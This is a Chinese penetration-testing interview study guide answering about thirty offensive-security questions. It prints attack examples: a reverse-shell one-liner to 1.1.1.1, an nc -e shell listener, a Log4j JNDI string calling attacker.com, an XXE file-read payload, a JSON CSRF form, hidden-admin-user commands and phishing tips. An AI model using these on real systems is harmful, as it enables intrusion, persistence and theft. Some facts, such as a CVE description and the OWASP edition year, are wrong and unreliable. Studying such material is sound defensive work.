网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库03
一、Windows与Linux系统提权思路
Windows提权
Linux提权
二、Python框架及漏洞
主流框架与漏洞
三、小程序与普通渗透的差异
四、App漏洞测试要点
五、IDS/IPS防护与绕过
防护原理
绕过思路
六、JSON相关漏洞
JSON CSRF利用
JSON数据包测试点
七、XXE漏洞原理与利用
原理
利用方式
八、内网信息收集
九、内网横向探测方法
十、外网打点流程
十一、FOFA使用技巧
十二、CDN识别方法
十三、邮件钓鱼准备
十四、CMS识别的意义
十五、Apache Log4j2漏洞原理
十六、水坑攻击与鱼叉攻击对比
十七、判断操作系统类型
十八、3389端口无法连接的原因
十九、建立隐藏用户(Windows)
二十、MySQL无法连接的原因
二十一、文件上传监测点
二十二、常见未授权访问漏洞
二十三、危险函数列表
二十四、正反向Shell对比
二十六、Web TOP 10漏洞(OWASP 2023)
二十七、SQL注入类型
二十八、中间件及漏洞
二十九、目录扫描工具
2025年渗透测试面试题总结-拷打题库03
谈一谈Windows系统与Linux系统提权的思路? python有哪些框架,其中出现过哪些漏洞 小程序的渗透和普通渗透的差异 app本身的漏洞测试 IDS/IPS防护原理及绕过思路 json的csrf的利用 json格式的数据包可以测哪些漏洞 简述xxe漏洞原理与利用方式 内网服务器,如何进行信息收集? 如果拿下了内网边界层的某一个机器,如何对内网其他进行探测? 描述外网打点的流程? 举几个 FOFA 在外网打点过程中的使用小技巧? 如何识别CDN? 邮件钓鱼的准备工作有哪些? 判断出靶标的 CMS,对外网打点有什么意义? Apache Log4j2 的漏洞原理是什么? 水坑攻击和鱼叉攻击的区别是什么? 如何判断靶标站点是 windows/linux? 无法连接服务器 3389 端口的几种情况? 如何建立隐藏用户? 为什么 Mysql 数据库的站点,无法连接? 文件上传功能的监测点有哪些? 常见的未授权访问漏洞有哪些? 代码执行、文件读取、命令执行的函数有哪些? 正向 shell 和反向 shell 的区别是什么? 正向代理和反向代理的区别? Web TOP 10 漏洞有哪些? SQL 注入的种类有哪些? 常见的中间件有哪些?他们有那些漏洞? 常见的目录扫描工具有哪些?
一、Windows与Linux系统提权思路
Windows提权
- 漏洞利用:
- 利用未修补的系统漏洞(如MS17-010永恒之蓝、CVE-2020-0796 SMBGhost)。
- 通过提权工具(如JuicyPotato、PrintSpoofer)滥用服务权限。
- 服务配置错误:
- 查找弱权限服务(
sc query
查看服务权限),通过修改可执行路径或参数注入恶意代码。- 利用AlwaysInstallElevated策略安装恶意MSI包。
- 令牌窃取:
- 使用Mimikatz抓取内存中的管理员令牌或凭证(如Pass-the-Hash)。
- 计划任务/启动项:
- 劫持高权限计划任务或注册表启动项(如
schtasks
)。Linux提权
- 内核漏洞:
- 利用CVE-2016-5195(DirtyCow)、CVE-2021-4034(PwnKit)等漏洞直接获取root权限。
- SUID/SGID滥用:
- 查找具有SUID权限的可执行文件(
find / -perm -4000
),利用配置不当程序(如find
、vim
)执行命令。- 环境变量劫持:
- 通过
LD_PRELOAD
注入恶意动态库,或劫持PATH路径中的程序。- 定时任务(Cron):
- 检查全局可写的Cron脚本或路径劫持(如利用通配符
*
的tar命令)。
二、Python框架及漏洞
主流框架与漏洞
- Django:
- CVE-2021-35042(URL路径遍历)、CVE-2019-14234(SQL注入)。
- Flask:
- 服务器端模板注入(SSTI)漏洞(如
{{ config.items() }}
泄露敏感信息)。- FastAPI:
- 依赖库漏洞(如
ujson
反序列化问题)。- Pickle反序列化:
- 使用
pickle.loads
处理用户输入导致远程代码执行(RCE)。
三、小程序与普通渗透的差异
对比项 小程序渗透 普通Web渗透 入口点 微信/支付宝客户端、云函数接口 传统Web页面、API接口 安全机制 HTTPS强制、Token鉴权、数据加密 依赖Cookie/Session、CORS策略 测试重点 云函数未授权、本地存储泄露、接口越权 SQL注入、XSS、CSRF、文件上传漏洞 逆向难度 需反编译小程序包(如wxapkg) 直接分析前端代码
四、App漏洞测试要点
- 本地存储安全:
- 检查
SharedPreferences
、SQLite数据库明文存储敏感数据。- 组件暴露:
- Android的Activity/Service导出导致未授权访问(如
adb shell am start
)。- SSL Pinning绕过:
- 使用Frida或Xposed框架Hook证书验证逻辑。
- API接口安全:
- 参数篡改(如修改用户ID越权)、重放攻击测试。
五、IDS/IPS防护与绕过
防护原理
- 签名检测:匹配已知攻击特征(如SQL关键字
UNION SELECT
)。- 行为分析:检测异常流量(如高频登录尝试)。
绕过思路
- 混淆技术:
- 对Payload进行编码(如Hex/Unicode/Base64)、分片传输。
- 协议滥用:
- 利用HTTP/2多路复用、分块传输编码(Chunked)绕过内容检测。
- 慢速攻击:
- 降低请求速率(如每秒1次)绕过阈值触发。
六、JSON相关漏洞
JSON CSRF利用
- 条件:服务端未校验
Content-Type
或依赖Cookie鉴权。- 构造Payload:
html<form action="http://target.com/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker","csrf":"' value='test"}' type="hidden"> </form>
JSON数据包测试点
- XXE注入:
- 修改
Content-Type
为application/xml
,插入恶意实体。- JSONP劫持:
- 未校验回调函数名(如
callback=alert(1)//
)。
七、XXE漏洞原理与利用
原理
- XML解析器未禁用外部实体引用,导致文件读取或SSRF。
利用方式
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>
- 防御:禁用DTD、使用JSON替代XML。
八、内网信息收集
- 网络拓扑探测:
- 使用
arp-scan
、nbtscan
发现存活主机。- 服务枚举:
- Nmap扫描端口(SMB 445、WinRM 5985、SSH 22)。
- 凭证获取:
- 提取内存密码(Mimikatz)、历史命令记录(
.bash_history
)。
九、内网横向探测方法
- 代理搭建:
- 使用EarthWorm/reGeorg建立Socks代理穿透内网。
- 横向移动:
- Pass-the-Ticket攻击Kerberos服务、WMI远程执行命令。
- 权限维持:
- 创建隐藏计划任务、SSH公钥植入。
十、外网打点流程
- 资产发现:
- 使用FOFA搜索
title="后台管理"
、header="thinkphp"
。- 漏洞验证:
- 优先测试历史漏洞(如Log4j2、Shiro反序列化)。
- 权限获取:
- 上传Webshell、利用RCE漏洞反弹Shell。
十一、FOFA使用技巧
- 精准搜索:
title="登录" && country="CN"
:定位中文登录页面。icon_hash="-123456"
:通过网站图标识别特定资产。- 关联分析:
cert="*.example.com"
:查找同一证书的关联域名。
十二、CDN识别方法
- 多地Ping:
- 使用
ping
或在线工具(如ipip.net )检测IP是否多地一致。- DNS历史记录:
- 通过SecurityTrails查看历史解析记录。
- 子域名探测:
- 主站使用CDN,但未备案的子域名可能直连真实IP。
十三、邮件钓鱼准备
- 目标画像:
- 收集目标邮箱、职位、社交动态(如LinkedIn)。
- 邮件伪造:
- 使用Swaks工具伪造发件人(如CEO@company.com )。
- Payload设计:
- 制作免杀宏文档(VBA代码混淆)、钓鱼链接短链跳转。
十四、CMS识别的意义
- 快速定位漏洞:
- 已知CMS(如WordPress、ThinkPHP)的公开漏洞可直接利用(如ThinkPHP 5.0 RCE)。
- 缩小攻击面:
- 针对性扫描默认路径(如
/wp-admin
)、插件目录。
十五、Apache Log4j2漏洞原理
- 漏洞核心:JNDI注入,攻击者通过
${jndi:ldap://attacker.com/exp}
触发远程类加载。- 影响范围:所有使用Log4j2 2.0-beta9至2.14.1版本的应用。
十六、水坑攻击与鱼叉攻击对比
对比项 水坑攻击 鱼叉攻击 目标 特定群体(如企业员工) 特定个人(如高管) 手段 劫持目标常访问的网站挂马 定向发送钓鱼邮件/文件 技术难度 需入侵高流量网站 依赖社会工程学精准伪装
十七、判断操作系统类型
- HTTP头特征:
- Windows服务器可能返回
Server: Microsoft-IIS/10.0
。- 文件路径差异:
- URL中出现
\
(如/images\test.jpg
)多为Windows。- 报错信息:
- Linux错误提示包含
/var/log/
路径。
十八、3389端口无法连接的原因
- 网络层问题:
- 防火墙拦截(入站规则未放行3389)。
- 服务配置:
- 远程桌面服务未启动(
services.msc
检查TermService)。- 认证限制:
- 仅允许特定用户组连接(如Administrators)。
十九、建立隐藏用户(Windows)
- 注册表操作:
- 创建用户后修改注册表
HKLM\SAM\Domains\Account\Users
,将用户键值设为与管理员相同的F
值。- 命令行隐藏:
- 使用
net user test$ /add
创建带$
的用户(部分工具不显示)。
二十、MySQL无法连接的原因
- 权限限制:
- 用户仅允许
localhost
访问(检查mysql.user
表)。- 网络配置:
- MySQL绑定IP为127.0.0.1,拒绝外部连接。
- 防火墙拦截:
- 云服务器安全组未放行3306端口。
二十一、文件上传监测点
- 类型校验:
- 绕过黑名单(如上传
.php5
、.phtml
)。- 内容检测:
- 插入图片马绕过文件头检测(GIF89a)。
- 路径控制:
- 利用目录穿越(如
filename="../../test.php"
)。
二十二、常见未授权访问漏洞
- Redis:
- 未设密码,可直接写入SSH公钥或Webshell。
- MongoDB:
- 默认无需认证,导致数据泄露。
- Kubernetes API:
- 匿名访问开启,可创建恶意容器。
二十三、危险函数列表
漏洞类型 函数示例 代码执行 eval()
、exec()
、popen()
文件读取 file_get_contents()
、fopen()
命令执行 system()
、shell_exec()
二十四、正反向Shell对比
对比项 正向Shell 反向Shell 连接方向 攻击者主动连接目标 目标主动连接攻击者 适用场景 目标出站受限(如防火墙严格) 绕过目标入站限制 典型命令 nc -lvp 4444 -e /bin/sh
bash -i >& /dev/tcp/1.1.1.1/4444 0>&1
二十六、Web TOP 10漏洞(OWASP 2023)
- 失效的访问控制(Broken Access Control)
- 加密机制缺失(Cryptographic Failures)
- 注入漏洞(Injection)
- 不安全设计(Insecure Design)
- 安全配置错误(Security Misconfiguration)
二十七、SQL注入类型
- 联合查询注入:
UNION SELECT
拼接数据。- 盲注(Boolean/Time):通过条件判断或延时差异提取数据。
- 报错注入:利用数据库报错回显信息(如
updatexml()
)。
二十八、中间件及漏洞
- Apache:
- 解析漏洞(
.php.xxx
)、CVE-2021-41773(路径遍历)。- Nginx:
- 目录穿越(CVE-2017-7529)、配置错误导致目录列表。
- Tomcat:
- 弱口令爆破后台、CVE-2020-1938(Ghostcat文件读取)。
二十九、目录扫描工具
- DirBuster:支持多线程、自定义字典。
- 御剑:快速扫描常见后台路径(如
/admin
)。- gobuster:基于Go语言,支持多种模式(dir、dns、vhost)。